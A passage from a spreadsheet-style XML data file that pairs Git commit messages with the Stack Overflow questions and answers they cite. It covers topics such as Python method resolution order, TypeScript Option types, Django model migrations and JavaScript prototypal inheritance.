&lt;li&gt;Is this the expected behavior?&lt;/li&gt;
&lt;li&gt;How can I configure the path alias so that I don't need to add &lt;code&gt;/index&lt;/code&gt; explicitly in the import?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;I've tried various methods, but the results have been futile&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Expected Behavior:&lt;/h2&gt;
&lt;p&gt;The import should resolve the path alias correctly without requiring the explicit addition of &lt;code&gt;/index&lt;/code&gt;. For example:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import { Colors } from &amp;quot;@utils&amp;quot;;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This should work without any errors, just like importing with &lt;code&gt;/index&lt;/code&gt; explicitly. The path alias should automatically resolve to the &lt;code&gt;index.ts&lt;/code&gt; file in the specified directory, and no additional folder navigation should be necessary.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>There are 2.11.0 JARs
(and source JARs!)
of Xerces in Maven Central since 20th February 2013! See
Xerces in Maven Central
. I wonder why they haven't resolved
https://issues.apache.org/jira/browse/XERCESJ-1454
...
I've used:
&lt;dependency&gt;
    &lt;groupId&gt;xerces&lt;/groupId&gt;
    &lt;artifactId&gt;xercesImpl&lt;/artifactId&gt;
    &lt;version&gt;2.11.0&lt;/version&gt;
&lt;/dependency&gt;
and all dependencies have resolved fine - even proper
xml-apis-1.4.01
!
And what's most important (and what wasn't obvious in the past) - the JAR in Maven Central is
the same JAR as in the official
Xerces-J-bin.2.11.0.zip
distribution
.
I couldn't however find
xml-schema-1.1-beta
version - it can't be a Maven
classifier
-ed version because of additional dependencies.</t>
  </si>
  <si>
    <t>C716</t>
  </si>
  <si>
    <t>model: fix inheritance by adding missing calls to super().__init__()
Due to missing calls to the initializer function (__init__) of parent
classes, not all superclasses were correctly initialized for classes
that inherit from multiple classes (e.g. Submodel, SubmodelElement).
https://stackoverflow.com/a/16310777/4780052</t>
  </si>
  <si>
    <t>This is detailed with a reasonable amount of detail by Guido himself in his blog post
Method Resolution Order
(including two earlier attempts).
In your example,
Third()
will call
First.__init__
. Python looks for each attribute in the class's parents as they are listed left to right. In this case, we are looking for
__init__
. So, if you define
class Third(First, Second):
    ...
Python will start by looking at
First
, and, if
First
doesn't have the attribute, then it will look at
Second
.
This situation becomes more complex when inheritance starts crossing paths (for example if
First
inherited from
Second
). Read the link above for more details, but, in a nutshell, Python will try to maintain the order in which each class appears on the inheritance list, starting with the child class itself.
So, for instance, if you had:
class First(object):
    def __init__(self):
        print "first"
class Second(First):
    def __init__(self):
        print "second"
class Third(First):
    def __init__(self):
        print "third"
class Fourth(Second, Third):
    def __init__(self):
        super(Fourth, self).__init__()
        print "that's it"
the MRO would be
[Fourth, Second, Third, First].
By the way: if Python cannot find a coherent method resolution order, it'll raise an exception, instead of falling back to behavior which might surprise the user.
Example of an ambiguous MRO:
class First(object):
    def __init__(self):
        print "first"
class Second(First):
    def __init__(self):
        print "second"
class Third(First, Second):
    def __init__(self):
        print "third"
Should
Third
's MRO be
[First, Second]
or
[Second, First]
? There's no obvious expectation, and Python will raise an error:
TypeError: Error when calling the metaclass bases
    Cannot create a consistent method resolution order (MRO) for bases Second, First
Why do the examples above lack
super()
calls? The point of the examples is to show how the MRO is constructed. They are
not
intended to print
"first\nsecond\third"
or whatever. You can – and should, of course, play around with the example, add
super()
calls, see what happens, and gain a deeper understanding of Python's inheritance model. But my goal here is to keep it simple and show how the MRO is built. And it is built as I explained:
&gt;&gt;&gt; Fourth.__mro__
(&lt;class '__main__.Fourth'&gt;,
 &lt;class '__main__.Second'&gt;, &lt;class '__main__.Third'&gt;,
 &lt;class '__main__.First'&gt;,
 &lt;type 'object'&gt;)</t>
  </si>
  <si>
    <t xml:space="preserve">I was involved in a discussion at work about which software systems various people had built were the biggest; biggest in this case being a combination of system complexity and implementation difficulty.
Since experienced programmers tend to get a gut feel for a project's size, even if they wouldn't put it in writing, I thought I'd pose the question to SO.
The systems under discussion were:
A telecoms billing system. 4 main features:
Real time call control where call credit was reserved from a database every 60s,
Customisable call plans, least cost routing, custom per user rates,
Capacity of 1000 simultaneous calls per billing server,
365x24x7 and 99.999% reliability.
A core wagering system for the racing industry. 4 main features:
Client/Server application supporting approx. 1000 cash outlets and 200 seat call centre,
NOT a fixed odds system, payouts calculated based on deducting a comission and sharing pools amongst winners,
Approximately 20 different bet types, max combination bet being First 4 placegetters,
350x20x7 and 99.9% reliability.
A Customer Relationship Management System. 4 main features:
AJAX user interface,
Email integration delivering to different queues based on recipient address,
Invoicing,
Web serivce API with authorisation for 3rd party integration.
There are an abundance of details missing but the thrust of the question is to rank the systems in order of descending "bigness" (see above for definition). Any scale will be arbitrary but to give it some relevance the scale below is suggested:
100 Space Shuttle Life Support System,
?? Application X
1 Hello World Console.
I'd be interested to see the rankings for the 3 systems above plus any other big systems people have worked in slotted in to give perspective.
</t>
  </si>
  <si>
    <t>C717</t>
  </si>
  <si>
    <t>Remove inheritance from object (#465)
Summary:
Inheritance from `object` was needed in Python2.
However, in Python3 classes are implicitly inherit from `object`.
More [info](https://stackoverflow.com/questions/4015417/why-do-python-classes-inherit-object) on it
Pull Request resolved: #465
Reviewed By: alexanderguzhva
Differential Revision: D44293772
Pulled By: aakhundov</t>
  </si>
  <si>
    <t>Is there any reason for a class declaration to inherit from
object
?
In Python 3, apart from compatibility between Python 2 and 3,
no reason
. In Python 2,
many reasons
.
Python 2.x story:
In Python 2.x (from 2.2 onwards) there's two styles of classes depending on the presence or absence of
object
as a base-class:
"classic" style
classes: they don't have
object
as a base class:
&gt;&gt;&gt; class ClassicSpam:      # no base class
...     pass
&gt;&gt;&gt; ClassicSpam.__bases__
()
"new" style
classes: they have, directly
or indirectly
(e.g inherit from a
built-in type
),
object
as a base class:
&gt;&gt;&gt; class NewSpam(object):           # directly inherit from object
...    pass
&gt;&gt;&gt; NewSpam.__bases__
(&lt;type 'object'&gt;,)
&gt;&gt;&gt; class IntSpam(int):              # indirectly inherit from object...
...    pass
&gt;&gt;&gt; IntSpam.__bases__
(&lt;type 'int'&gt;,) 
&gt;&gt;&gt; IntSpam.__bases__[0].__bases__   # ... because int inherits from object  
(&lt;type 'object'&gt;,)
Without a doubt, when writing a class you'll
always
want to go for new-style classes. The perks of doing so are numerous, to list some of them:
Support for descriptors
. Specifically, the following constructs are made possible with descriptors:
classmethod
: A method that receives the class as an implicit argument instead of the instance.
staticmethod
: A method that does not receive the implicit argument
self
as a first argument.
properties with
property
: Create functions for managing the getting, setting and deleting of an attribute.
__slots__
: Saves memory consumptions of a class and also results in faster attribute access. Of course, it does
impose limitations
.
The
__new__
static method: lets you customize how new class instances are created.
Method resolution order (MRO)
: in what order the base classes of a class will be searched when trying to resolve which method to call.
Related to MRO,
super
calls
. Also see,
super()
considered super.
If you don't inherit from
object
, forget these. A more exhaustive description of the previous bullet points along with other perks of "new" style classes can be found
here
.
One of the downsides of new-style classes is that the class itself is more memory demanding. Unless you're creating many class objects, though, I doubt this would be an issue and it's a negative sinking in a sea of positives.
Python 3.x story:
In Python 3, things are simplified. Only new-style classes exist (referred to plainly as classes) so, the only difference in adding
object
is requiring you to type in 8 more characters. This:
class ClassicSpam:
    pass
is completely equivalent (apart from their name :-) to this:
class NewSpam(object):
     pass
and to this:
class Spam():
    pass
All have
object
in their
__bases__
.
&gt;&gt;&gt; [object in cls.__bases__ for cls in {Spam, NewSpam, ClassicSpam}]
[True, True, True]
So, what should you do?
In Python 2:
always inherit from
object
explicitly
. Get the perks.
In Python 3:
inherit from
object
if you are writing code that tries to be Python agnostic, that is, it needs to work both in Python 2 and in Python 3. Otherwise don't, it really makes no difference since Python inserts it for you behind the scenes.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I made an ASCII video player that runs in the Windows command prompt. However, I am having issues in regards to having the frames print at the same speed (FPS) as the original video.&lt;/p&gt;
&lt;p&gt;At first I thought that my methods of converting video frames to ASCII art in real time were too inefficient so I worked on optimizing these methods and even thought I got them to be faster the ASCII video still seems to be too slow. This is how I am adding a delay:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Thread.Sleep((int)frameDelay);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where &amp;quot;frameDelay&amp;quot; is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;double fps = (int)capture.Get(Emgu.CV.CvEnum.CapProp.Fps);
double frameDelay = 1000 / fps;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With this delay I can see that the ASCII video is a little slower than the original video meaning that if I wanted to add audio it will not work since the two would not be synchronized.&lt;/p&gt;
&lt;p&gt;So to really understand whether it is my program that is too slow, I decided to save all the ASCII frames into a text file and then run the video player again but this time not by processing each frame and converting them to ASCII art in real time, but rather simply by extracting them from said file.&lt;/p&gt;
&lt;p&gt;I achieved this with this approach:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int bytesPerLine = 61; // 60 characters (1 byte under UTF-8) + 1 \n character
StringBuilder buffer = new StringBuilder();
using (FileStream ASCIIStream = new FileStream(@&amp;quot;TEXT FILE PATH&amp;quot;, FileMode.Open, FileAccess.Read))
{
    for (int currLine = 0; currLine &amp;lt; 90630; currLine += 45)
    {
        if (currLine != 0)
        {
            updateFrame(frameSize.Height); // frameSize = (60, 45), see updateFrame definition below
            buffer.Clear();
        }
        long byteOffset = bytesPerLine * currLine;
        ASCIIStream.Seek(byteOffset, SeekOrigin.Begin);
        using (StreamReader reader = new StreamReader(ASCIIStream, Encoding.UTF8, leaveOpen: true))
        {
            for (int i = 0; i &amp;lt; 45; i++)
            {
                string line = reader.ReadLine();
                buffer.AppendLine(line);
            }
            Console.WriteLine(buffer.ToString());
            Thread.Sleep((int)frameDelay); // I am losing my will to live
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The purpose of this was to see what would happen with the massive performance increase. As expected without the delay the entire ASCII video would finish in a few seconds (the sample video is 1 minute and 10 seconds long), however when I added the same delay back in, the frames still printed too slowly in the command prompt.&lt;/p&gt;
&lt;p&gt;Now I just don't know what to think. Is it an issue with Thread.Sleep? Is the rendering in the command prompt too slow? Am I not calculating the delay correctly?&lt;/p&gt;
&lt;h2&gt;Other information&lt;/h2&gt;
&lt;p&gt;updateFrame method:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void updateFrame(int y)
{ 
    for (int i = 0; i &amp;lt; y; i++)
    {
        // Move cursor up by 'y' lines
        Console.Write(&amp;quot;\u001b[&amp;quot; + y + &amp;quot;A&amp;quot;);
       // Clear the line
       Console.Write(&amp;quot;\u001b[K&amp;quot;);
    }
    //Return cursor to the start of the line
    Console.Write(&amp;quot;\r&amp;quot;);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(I also tried Console.Clear(), however there seemed to be a weird flickering on the screen when I used it so I just decided to clear the frames line by line).&lt;/p&gt;
&lt;h2&gt;Quick Side Note&lt;/h2&gt;
&lt;p&gt;I saw a YouTuber make this exact program but in C++ and his delay calculation was the same as mine and his ran at exactly the same speed as the original video. Not to mention that he printed the ASCII frames at a higher resolution (I am printing mine at 60x40). This is the video in question: &lt;a href="https://www.youtube.com/watch?v=Xp6j7m7rqBc&amp;amp;t=1581s" rel="nofollow noreferrer"&gt;https://www.youtube.com/watch?v=Xp6j7m7rqBc&amp;amp;t=1581s&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C718</t>
  </si>
  <si>
    <t>fix: inherit with grandparent's class directly
Some devices cause error with super(BertTokenizer, self).__init__() as
TypeError: super(type, obj): obj must be an instance or subtype of type
cf. https://stackoverflow.com/questions/43016737/python-inheritance-how-to-call-grandparent-method</t>
  </si>
  <si>
    <t>There are two ways to go around this:
Either you can use
A.foo(self)
method explicitly as the others have suggested - use this when you want to call the method of the
A
class with disregard as to whether
A
is
B
's parent class or not:
class C(B):
  def foo(self):
    tmp = A.foo(self) # call A's foo and store the result to tmp
    return "C"+tmp
Or, if you want to use the
.foo()
method of
B
's parent class regardless of whether the parent class is
A
or not, then use:
class C(B):
  def foo(self):
    tmp = super(B, self).foo() # call B's father's foo and store the result to tmp
    return "C"+tmp</t>
  </si>
  <si>
    <t xml:space="preserve">I've got a system I'm designing where we're using 4 specialized PCs we manufacture in-house that has 16 serial ports (db-9 RS232) I need to communicate with 64 units simultaneously (4x16) and manage the communications.  Here's the model I came up with and I'm soliciting feedback
Server:
Runs on one system and coordinates client applications.  Maintains a master state machine and makes sure that the clients are in lock step with that state machine.  (For instance, all units do task A, when the last one reports completion, all units do task B).
Communicates via .net remoting? WCF?
Client:
Can run on the same system as the server.  Manages all the IO. Manages business logic for actual task execution (bad idea?) Reports status through Remoting/WCF via notification events (for instance INotifyPropertyChanged).
I've never worked with .net remoting or ANY sort of distributed applications so I'm a total novice at this, but I do learn quickly.  Literature and community advice would be much appreciated at this point.
</t>
  </si>
  <si>
    <t>C719</t>
  </si>
  <si>
    <t>Add Option type
I went with a class-based implementation to make it comparable to
Promises. I tried to get the typing right, but didn't manage in
a reasonable amount of time.
Some.value is of type T and None.value is of type never. Just what
I want. Sadly, Option.value is not that strict. Next time.
Now even more so than ever, I prefer the collection of pure functions
used in FP-TS and F#. So much more straight foreward. But that
way of constructing programmes only works so well in JS.
Used the F# docs to verify the bind signature:
https://fsharp.github.io/fsharp-core-docs/reference/fsharp-core-optionmodule.html#bind
Got some class typing help from StackOverflow: (what a pain that was)
https://stackoverflow.com/questions/70596483/implementing-maybe-option-type-in-typescript-using-class-inheritance</t>
  </si>
  <si>
    <t>The minimal change to your code necessary to get it working would probably be this:
class None extends Maybe&lt;never&gt; {
    constructor() { super(null!); }
}
That is, we are saying that
None
is a
Maybe&lt;never&gt;
, where
the
never
type
is the
bottom type
with no values.  This is reasonable from a type system standpoint: the "right" type would be something like
forall T. Maybe&lt;T&gt;
, but since TypeScript doesn't have "generic values" like
microsoft/TypeScript#17574
there's no way to express such a type directly.  Since it looks like
Maybe&lt;T&gt;
should be
covariant
in
T
, then you could rephrase
forall T. Maybe&lt;T&gt;
as
Maybe&lt;forall T. T&gt;
, which would be equivalent to
Maybe&lt;never&gt;
as the intersection of all types in TypeScript is
never
.
But in order to
construct
a
Maybe&lt;never&gt;
with your code you need to supply a value of type
never
to the super constructor.  This, of course, can't happen.  You're passing
null
, which is not a
never
.  We can use the
non-null assertion operator (postfix
!
)
to downcast
null
to
never
(the type of
null!
is
NonNullable&lt;null&gt;
which is
never
).  This is technically a lie, but it's a fairly harmless one, especially if you never try to observe the value later.
If you want to be type safe everywhere then I think you'd need to refactor your base class so that it doesn't pretend to do things it can't do.  A
Maybe&lt;T&gt;
might not have a
value
so
value
probably shouldn't be required in the base class.  It could be
optional
:
abstract class Maybe&lt;T&gt; {
    constructor(public value?: T) { } // &lt;-- optional
    unwrap(): T {
        if (this.isSome()) return this.value; // reverse check
        throw new Error('called unwrap() on None');
    }
    unwrapOr(defaultValue: T): T {
        return this.isSome() ? this.value : defaultValue; // reverse check
    }
}
class Some&lt;T&gt; extends Maybe&lt;T&gt; {
    declare value: T // &lt;-- narrow from optional to required
    constructor(value: T) { super(value); }
}
class None extends Maybe&lt;never&gt; {
    constructor() { super(); } // &lt;-- don't need an argument now
}
And then you can
declare
the property in the subclass
to be required (and I have to make it
public
since
private
doesn't let subclasses look at things and even
protected
gets iffy with those type guard functions you have).  Note that I switched your checks from
isNone()
to
isSome()
... the
Maybe&lt;T&gt;
class is not known to be a
union
of
Some&lt;T&gt; | None
, so you can't use a false result of
isNone()
to conclude that
this.value
is present.  Instead you should use a true result of
isSome()
.
Finally, you could just move all the
Some
/
None
specific functionality out of
Maybe
, and then stop worrying about trying to force the base class to behave like both subclasses.  Inheritance-based polymorphism tends to prefer subclasses to override methods instead of having a superclass method that checks for
instanceof
.  This is similar to having
Maybe
just be an
interface
, with the exception of any truly polymorphic methods that don't need to check for the current class:
abstract class Maybe&lt;T&gt; {
    abstract isSome(): this is Some&lt;T&gt;;
    abstract isNone(): this is None;
    abstract and&lt;U&gt;(other: Maybe&lt;U&gt;): Maybe&lt;U&gt;;
    abstract unwrapOr(defaultValue: T): T;
}
class Some&lt;T&gt; extends Maybe&lt;T&gt; {
    private value: T
    constructor(value: T) { super(); this.value = value; }
    isSome(): this is Some&lt;T&gt; { return true; }
    isNone(): this is None { return false; }
    and&lt;U&gt;(other: Maybe&lt;U&gt;) {
        return other;
    }
    unwrap() { return this.value }
    unwrapOr(defaultValue: T) { return this.value }
}
class None extends Maybe&lt;never&gt; {
    isSome&lt;T&gt;(): this is Some&lt;T&gt; { return false }
    isNone(): this is None { return true }
    and&lt;U&gt;(other: Maybe&lt;U&gt;) {
        return this;
    }
    unwrapOr&lt;T&gt;(defaultValue: T) { return defaultValue }
}
Here, there's nothing in
Maybe
except for abstract methods.  If you can come up with something that doesn't need to check if
this.isSome()
or
this.isNone()
then it can go in the base class.  The only noteworthy thing here is that some of the subclassing for
Maybe&lt;never&gt;
involves turning non-generic methods (
isSome
and
unwrapOr
) into generic methods.
Playground link to code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using a NetSuite dataset (N/dataset API in SuiteScript 2.1) to retrieve existing dataset results. The dataset returns results in JSON format, including columns like PO Status, Billing Status, Sub Product, and Subsidiary.&lt;/p&gt;
&lt;p&gt;However, instead of meaningful text values, some fields return unexpected codes:&lt;/p&gt;
&lt;p&gt;PO Status: &amp;quot;F&amp;quot; or &amp;quot;D&amp;quot; instead of Partially Received.&lt;/p&gt;
&lt;p&gt;Billing Status: &amp;quot;A&amp;quot; instead of Open.&lt;/p&gt;
&lt;p&gt;Sub Product: 20 instead of a sub product name.&lt;/p&gt;
&lt;p&gt;Subsidiary: 2/7, which seems internal ids&lt;/p&gt;
&lt;p&gt;I cannot map these values statically because more values may be added in the future.&lt;/p&gt;
&lt;p&gt;What I Tried&lt;/p&gt;
&lt;p&gt;Used row.values[index] to extract values.&lt;/p&gt;
&lt;p&gt;Looked for a .getText() method, but it doesn't work with datasets.&lt;/p&gt;
&lt;p&gt;Checked if join in the dataset query was affecting the values.&lt;/p&gt;
&lt;p&gt;Expected vs. Actual Results&lt;/p&gt;
&lt;p&gt;Expected: &amp;quot;Purchase Order: Parially received&amp;quot;, &amp;quot;Bill:Open&amp;quot;, &amp;quot;Product Name&amp;quot;, &amp;quot;Subsidiary Name&amp;quot;
Actual: &amp;quot;D&amp;quot;, &amp;quot;A&amp;quot;, &amp;quot;20&amp;quot;, &amp;quot;2&amp;quot;&lt;/p&gt;
&lt;p&gt;Question&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Why does the dataset return codes (F/D, A, 2/7) instead of readable text?&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;How can I dynamically convert these internal values into their corresponding text labels?&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;function execute(context) {&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            // Load dataset
            let myDataset = dataset.load({ id: 'custdataset70' });
            // Run dataset and get results
             let results = myDataset.run();
  }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C72</t>
  </si>
  <si>
    <t>Move Project model to core app
Before Django 1.7 it was really difficult to move models between apps. But
since Django 1.7 it became much easier, but still undocumented.
Here is StackOverflow page with instructions how to do it:
http://stackoverflow.com/a/26472482/475477
Why I moved Project model to core app?
When project grows and requirements changes, you have to refactor your code to
maintain clean project structure. Most of the code can be refactored quite
easily, but models requires extra care. That is why it is recommended to keep
you project data layer in single app to avoid frequent model refactoring.
Also since models is in lowest layer, all other layers depends on them. When
models are defined in single place it is easier to manage dependencies between
different code parts.</t>
  </si>
  <si>
    <t>This can be done fairly easily using migrations.SeparateDatabaseAndState. Basically, we use a database operation to rename the table concurrently with two state operations to remove the model from one app's history and create it in another's.
Remove from old app
python manage.py makemigrations old_app --empty
In the migration:
class Migration(migrations.Migration):
    dependencies = []
    database_operations = [
        migrations.AlterModelTable('TheModel', 'newapp_themodel')
    ]
    state_operations = [
        migrations.DeleteModel('TheModel')
    ]
    operations = [
        migrations.SeparateDatabaseAndState(
            database_operations=database_operations,
            state_operations=state_operations)
    ]
Add to new app
First, copy the model to the new app's model.py, then:
python manage.py makemigrations new_app
This will generate a migration with a naive CreateModel operation as the sole operation. Wrap that in a SeparateDatabaseAndState operation such that we don't try to recreate the table. Also include the prior migration as a dependency:
class Migration(migrations.Migration):
    dependencies = [
        ('old_app', 'above_migration')
    ]
    state_operations = [
        migrations.CreateModel(
            name='TheModel',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
            ],
            options={
                'db_table': 'newapp_themodel',
            },
            bases=(models.Model,),
        )
    ]
    operations = [
        migrations.SeparateDatabaseAndState(state_operations=state_operations)
    ]</t>
  </si>
  <si>
    <t xml:space="preserve">I've seen SaaS applications hosted in many different ways. Is it a good idea to split features and modules across multiple databases? For example, putting things like the User table on one DB and feature/app specific tables on another DB and perhaps other commonly shared tables in another DB?
</t>
  </si>
  <si>
    <t>C720</t>
  </si>
  <si>
    <t>Use isinstance for type checking
This helps dealing with class inheritances.
https://stackoverflow.com/a/1549854</t>
  </si>
  <si>
    <t>To summarize the contents of other (already good!) answers,
isinstance
caters for inheritance (an instance of a derived class
is an
instance of a base class, too), while checking for equality of
type
does not (it demands identity of types and rejects instances of subtypes, AKA subclasses).
Normally, in Python, you want your code to support inheritance, of course (since inheritance is so handy, it would be bad to stop code using yours from using it!), so
isinstance
is less bad than checking identity of
type
s because it seamlessly supports inheritance.
It's not that
isinstance
is
good
, mind you—it's just
less bad
than checking equality of types.  The normal, Pythonic, preferred solution is almost invariably "duck typing": try using the argument
as if
it was of a certain desired type, do it in a
try
/
except
statement catching all exceptions that could arise if the argument was not in fact of that type (or any other type nicely duck-mimicking it;-), and in the
except
clause, try something else (using the argument "as if" it was of some other type).
basestring
is
, however, quite a special case—a builtin type that exists
only
to let you use
isinstance
(both
str
and
unicode
subclass
basestring
). Strings are sequences (you could loop over them, index them, slice them, ...), but you generally want to treat them as "scalar" types—it's somewhat incovenient (but a reasonably frequent use case) to treat all kinds of strings (and maybe other scalar types, i.e., ones you can't loop on) one way, all containers (lists, sets, dicts, ...) in another way, and
basestring
plus
isinstance
helps you do that—the overall structure of this idiom is something like:
if isinstance(x, basestring)
  return treatasscalar(x)
try:
  return treatasiter(iter(x))
except TypeError:
  return treatasscalar(x)
You could say that
basestring
is an
Abstract Base Class
("ABC")—it offers no concrete functionality to subclasses, but rather exists as a "marker", mainly for use with
isinstance
. The concept is obviously a growing one in Python, since
PEP 3119
, which introduces a generalization of it, was accepted and has been implemented starting with Python 2.6 and 3.0.
The PEP makes it clear that, while ABCs can often substitute for duck typing, there is generally no big pressure to do that (see
here
). ABCs as implemented in recent Python versions do however offer extra goodies:
isinstance
(and
issubclass
) can now mean more than just "[an instance of] a derived class" (in particular, any class can be "registered" with an ABC so that it will show as a subclass, and its instances as instances of the ABC); and ABCs can also offer extra convenience to actual subclasses in a very natural way via Template Method design pattern applications (see
here
and
here
[[part II]] for more on the TM DP, in general and specifically in Python, independent of ABCs).
For the underlying mechanics of ABC support as offered in Python 2.6, see
here
; for their 3.1 version, very similar, see
here
.  In both versions, standard library module
collections
(that's the 3.1 version—for the very similar 2.6 version, see
here
) offers several useful ABCs.
For the purpose of this answer, the key thing to retain about ABCs (beyond an arguably more natural placement for TM DP functionality, compared to the classic Python alternative of mixin classes such as
UserDict.DictMixin
) is that they make
isinstance
(and
issubclass
) much more attractive and pervasive (in Python 2.6 and going forward) than they used to be (in 2.5 and before), and therefore, by contrast, make checking type equality an even worse practice in recent Python versions than it already used to be.</t>
  </si>
  <si>
    <t xml:space="preserve">We have an architecture where we use SSIS to extract data from XML batch files into a staging database for validation, prior to exporting it into production. 
We control the XML format to some extent, and I've been asked to determine what the maximum number of records the XML batch file should contain. Based on the XML schema and some sample data, I can estimate the average record size and do some projections from there.
However, coming at it from the other angle, I'd like to get an indication of the technical limitations of SSIS when dealing with large XML files. 
I'm aware that SSIS will flatten and transform the XML document into its own tabular, in-memory representation, so RAM becomes an obvious limiting factor but in what proportion?
Can you say something like, SSIS requires something like at least 2.5 times the size of the file you're trying to load, in available memory? Assuming that I have a 32GB box dedicated to this data-loading function, how large can my XML files be? 
I'm aware that there might other factors included, such as the complexity of the schema, number of nested elements, etc. but it'd be nice to have a starting point. 
</t>
  </si>
  <si>
    <t>C721</t>
  </si>
  <si>
    <t>Rewrote puzzle classes to make proper use of prototypal inheritance
  - http://stackoverflow.com/questions/2800964/benefits-of-prototypal-inheritance-over-classical
  - http://aaditmshah.github.io/why-prototypal-inheritance-matters/</t>
  </si>
  <si>
    <t>Note: Since I wrote this answer 10 years ago, I have learned that inheritance is harmful. There's no good reason to ever use inheritance in software development. Everything that you can do with inheritance, you can do better with composition. Consider using algebraic data types instead.
I know that this answer is 3 years late but I really think the current answers do not provide enough information about how prototypal inheritance is better than classical inheritance.
First let's see the most common arguments JavaScript programmers state in defence of prototypal inheritance (I'm taking these arguments from the current pool of answers):
It's simple.
It's powerful.
It leads to smaller, less redundant code.
It's dynamic and hence it's better for dynamic languages.
Now these arguments are all valid, but nobody has bothered explaining why. It's like telling a child that studying Maths is important. Sure it is, but the child certainly doesn't care; and you can't make a child like Maths by saying that it's important.
I think the problem with prototypal inheritance is that it's explained from the perspective of JavaScript. I love JavaScript, but prototypal inheritance in JavaScript is wrong. Unlike classical inheritance there are two patterns of prototypal inheritance:
The prototypal pattern of prototypal inheritance.
The constructor pattern of prototypal inheritance.
Unfortunately JavaScript uses the constructor pattern of prototypal inheritance. This is because when JavaScript was created, Brendan Eich (the creator of JS) wanted it to look like Java (which has classical inheritance):
And we were pushing it as a little brother to Java, as a complementary language like Visual Basic was to C++ in Microsoft’s language families at the time.
This is bad because when people use constructors in JavaScript they think of constructors inheriting from other constructors. This is wrong. In prototypal inheritance objects inherit from other objects. Constructors never come into the picture. This is what confuses most people.
People from languages like Java, which has classical inheritance, get even more confused because although constructors look like classes they don't behave like classes. As Douglas Crockford stated:
This indirection was intended to make the language seem more familiar to classically trained programmers, but failed to do that, as we can see from the very low opinion Java programmers have of JavaScript. JavaScript’s constructor pattern did not appeal to the classical crowd. It also obscured JavaScript’s true prototypal nature. As a result, there are very few programmers who know how to use the language effectively.
There you have it. Straight from the horse's mouth.
True Prototypal Inheritance
Prototypal inheritance is all about objects. Objects inherit properties from other objects. That's all there is to it. There are two ways of creating objects using prototypal inheritance:
Create a brand new object.
Clone an existing object and extend it.
Note: JavaScript offers two ways to clone an object - delegation and concatenation. Henceforth I'll use the word "clone" to exclusively refer to inheritance via delegation, and the word "copy" to exclusively refer to inheritance via concatenation.
Enough talk. Let's see some examples. Say I have a circle of radius 5:
var circle = {
    radius: 5
};
We can calculate the area and the circumference of the circle from its radius:
circle.area = function () {
    var radius = this.radius;
    return Math.PI * radius * radius;
};
circle.circumference = function () {
    return 2 * Math.PI * this.radius;
};
Now I want to create another circle of radius 10. One way to do this would be:
var circle2 = {
    radius: 10,
    area: circle.area,
    circumference: circle.circumference
};
However JavaScript provides a better way - delegation. The Object.create function is used to do this:
var circle2 = Object.create(circle);
circle2.radius = 10;
That's all. You just did prototypal inheritance in JavaScript. Wasn't that simple? You take an object, clone it, change whatever you need to, and hey presto - you got yourself a brand new object.
Now you might ask, "How is this simple? Every time I want to create a new circle I need to clone circle and manually assign it a radius". Well the solution is to use a function to do the heavy lifting for you:
function createCircle(radius) {
    var newCircle = Object.create(circle);
    newCircle.radius = radius;
    return newCircle;
}
var circle2 = createCircle(10);
In fact you can combine all of this into a single object literal as follows:
var circle = {
    radius: 5,
    create: function (radius) {
        var circle = Object.create(this);
        circle.radius = radius;
        return circle;
    },
    area: function () {
        var radius = this.radius;
        return Math.PI * radius * radius;
    },
    circumference: function () {
        return 2 * Math.PI * this.radius;
    }
};
var circle2 = circle.create(10);
Prototypal Inheritance in JavaScript
If you notice in the above program the create function creates a clone of circle, assigns a new radius to it and then returns it. This is exactly what a constructor does in JavaScript:
function Circle(radius) {
    this.radius = radius;
}
Circle.prototype.area = function () {
    var radius = this.radius;
    return Math.PI * radius * radius;
};
Circle.prototype.circumference = function () {         
    return 2 * Math.PI * this.radius;
};
var circle = new Circle(5);
var circle2 = new Circle(10);
The constructor pattern in JavaScript is the prototypal pattern inverted. Instead of creating an object you create a constructor. The new keyword binds the this pointer inside the constructor to a clone of the prototype of the constructor.
Sounds confusing? It's because the constructor pattern in JavaScript unnecessarily complicates things. This is what most programmers find difficult to understand.
Instead of thinking of objects inheriting from other objects they think of constructors inheriting from other constructors and then become utterly confused.
So what are the benefits of prototypal inheritance over classical inheritance? Let's go through the most common arguments again, and explain why.
1. Prototypal Inheritance is Simple
CMS states in his answer:
In my opinion the major benefit of prototypal inheritance is its simplicity.
Let's consider what we just did. We created an object circle which had a radius of 5. Then we cloned it and gave the clone a radius of 10.
Hence we only need two things to make prototypal inheritance work:
A way to create a new object (e.g. object literals).
A way to extend an existing object (e.g. Object.create).
In contrast classical inheritance is much more complicated. In classical inheritance you have:
Classes.
Object.
Interfaces.
Abstract Classes.
Final Classes.
Virtual Base Classes.
Constructors.
Destructors.
You get the idea. The point is that prototypal inheritance is easier to understand, easier to implement, and easier to reason about.
As Steve Yegge puts it in his classical blog post "Portrait of a N00b":
Metadata is any kind of description or model of something else. The comments in your code are just a a natural-language description of the computation. What makes metadata meta-data is that it's not strictly necessary. If I have a dog with some pedigree paperwork, and I lose the paperwork, I still have a perfectly valid dog.
